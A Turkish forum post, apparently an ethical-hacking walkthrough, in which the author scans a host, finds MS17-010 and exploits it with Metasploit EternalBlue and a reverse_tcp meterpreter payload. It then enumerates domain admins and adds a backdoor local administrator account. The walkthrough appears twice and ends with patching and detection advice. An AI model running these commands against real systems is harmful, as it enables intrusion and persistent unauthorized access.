HERAKLES Otomatik Avlı kalıcı sunucu. 19 Haziran'da açılıyor. Atius & Wizard güvencesiyle hemen kayıt ol, ön kayıt ödülleri aktif. HEMEN TIKLA!
Hedef bilgisayarın zafiyetlerini görebilmek için NMAP tool’unu kullanacağım.
Nmap ile hedef bilgisayara ulaşabilirliğimi kontrol edilyorum.
Ping 1.1.1.4
Nmap 1.1.1.4 komutunu kullanıyorum ve hedef bilgisayarda erişebileceğim port’ları görebiliyorum.
445/tcp Microsoft-ds port’unu kullanacağım.
MS17-010 update’inin hedef bilgisayar da kontrolünü aşağıdaki komut ile yapıyorum.
Nmap -p445 –script smb-vuln-ms17-010 1.1.1.4
Komutumuzun çalışması sonucunda MS17-010 açığının olduğunu tespit ediyorum. Hedef bilgisayar da windows güncellemelerinin tam olarak yapılmadığını göryorum
Bu aşamada Vulnerability Analiz aşamasını tamamlamış oluyoruz ve Metaspolit ile Sızma Testi aşamasına geçiyoruz.
Metaspolit aşağıdaki gibi çalıştırılır.
Aşağıdaki komutlar kullanılarak sızma testine devam ediyorum.
Use exploit/windows/smb/ms17_010_eternalblue
Set rhost 1.1.1.4
Set payload windows/x64/meterpreter/reverse_tcp
Set lhost 1.1.1.3
Show Options komutu kullanarak girilen bilgileri kontrol ediyorum.
Exploit yada Run komutu kullanılarak hedef sisteme erişim sağlıyorum.
Sysinfo komutu ile hedef system hakkında bilgileri görebiliyorum.
Shell komutu kullanarak hedef makina da shell açıyorum ve Dır komutu kullanarak dosya ve dizinleri listeliyorum.
Whoami /all komutu kullanarak “SYSTEM” account ile oturum açtığımı görüyorum.
Ipconfig /all komutu kullanarak hedef makinanın bulunduğu domain’in adını ve DC’nin adını tespit ediyorum.
Net user /domain komutu kullanarak hedef bilgisayarın bulunduğu domain deki tüm kullanıcıların listesini alıyorum.
Net groups “domain admins” /domain komutu ile “Domain Admins” grubunun üyelerini listeliyorum.
Net user volkan /domain komutu ile domain admin olan Volkan user’ının attribute’lerini görüntülüyorum. Yani en son oturum açma, parola değiştirme zamanı bilgilerine ulaşabiliyorum.
Net user /add GaziEtikHacker Gazi246135* komutu ile GaziEtikHacker isimli bir kullanıcı oluşturuyorum.
Net localgroup “administrators” GaziEtikHacker /add komutu ile oluşturmuş olduğum kullanıcıyı hedef bilgisayarın administrators (local admins) grubuna ekleyerek, hedef bilgisayar da en yüksek yetkilere sahip bir kullanıcım oluyor.
N O T: Kesinlikle bilgisayarlarımızı güncel tutmalıyız, Windows güncellemelerini zamanın da ve tam olarak yapmalıyız . Ayrıca bilgisayarımız da bulunan tüm uygulamalarında güncellemelerini yapmalıyız.
———————————————————————————————————————————————
Nmap ile hedef bilgisayara ulaşabilirliğimi kontrol edilyorum.
Ping 1.1.1.4
Nmap 1.1.1.4 komutunu kullanıyorum ve hedef bilgisayarda erişebileceğim port’ları görebiliyorum.
445/tcp Microsoft-ds port’unu kullanacağım.
MS17-010 update’inin hedef bilgisayar da kontrolünü aşağıdaki komut ile yapıyorum.
Nmap -p445 –script smb-vuln-ms17-010 1.1.1.4
Komutumuzun çalışması sonucunda MS17-010 açığının olduğunu tespit ediyorum. Hedef bilgisayar da windows güncellemelerinin tam olarak yapılmadığını göryorum
Bu aşamada Vulnerability Analiz aşamasını tamamlamış oluyoruz ve Metaspolit ile Sızma Testi aşamasına geçiyoruz.
Metaspolit aşağıdaki gibi çalıştırılır.
Aşağıdaki komutlar kullanılarak sızma testine devam ediyorum.
Use exploit/windows/smb/ms17_010_eternalblue
Set rhost 1.1.1.4
Set payload windows/x64/meterpreter/reverse_tcp
Set lhost 1.1.1.3
Show Options komutu kullanarak girilen bilgileri kontrol ediyorum.
Exploit yada Run komutu kullanılarak hedef sisteme erişim sağlıyorum.
Sysinfo komutu ile hedef system hakkında bilgileri görebiliyorum.
Shell komutu kullanarak hedef makina da shell açıyorum ve Dır komutu kullanarak dosya ve dizinleri listeliyorum.
Whoami /all komutu kullanarak “SYSTEM” account ile oturum açtığımı görüyorum.
Ipconfig /all komutu kullanarak hedef makinanın bulunduğu domain’in adını ve DC’nin adını tespit ediyorum.
Net user /domain komutu kullanarak hedef bilgisayarın bulunduğu domain deki tüm kullanıcıların listesini alıyorum.
Net groups “domain admins” /domain komutu ile “Domain Admins” grubunun üyelerini listeliyorum.
Net user volkan /domain komutu ile domain admin olan Volkan user’ının attribute’lerini görüntülüyorum. Yani en son oturum açma, parola değiştirme zamanı bilgilerine ulaşabiliyorum.
Net user /add GaziEtikHacker Gazi246135* komutu ile GaziEtikHacker isimli bir kullanıcı oluşturuyorum.
Net localgroup “administrators” GaziEtikHacker /add komutu ile oluşturmuş olduğum kullanıcıyı hedef bilgisayarın administrators (local admins) grubuna ekleyerek, hedef bilgisayar da en yüksek yetkilere sahip bir kullanıcım oluyor.
N O T: Kesinlikle bilgisayarlarımızı güncel tutmalıyız, Windows güncellemelerini zamanın da ve tam olarak yapmalıyız . Ayrıca bilgisayarımız da bulunan tüm uygulamalarında güncellemelerini yapmalıyız.
———————————————————————————————————————————————
- ATA yada Azure ATP kullanınız.
- PAW (high secure workstation) kullanınız.
- Anti virüs + EDR + Malware Detection kullanınız.
- Aduit Log’ların doğru konfigüre edildiğinden ve aktif olduğundan emin olunuz.
Şu an konuyu görüntüleyenler (Toplam : 0, Üye: 0, Misafir: 0)
Benzer konular
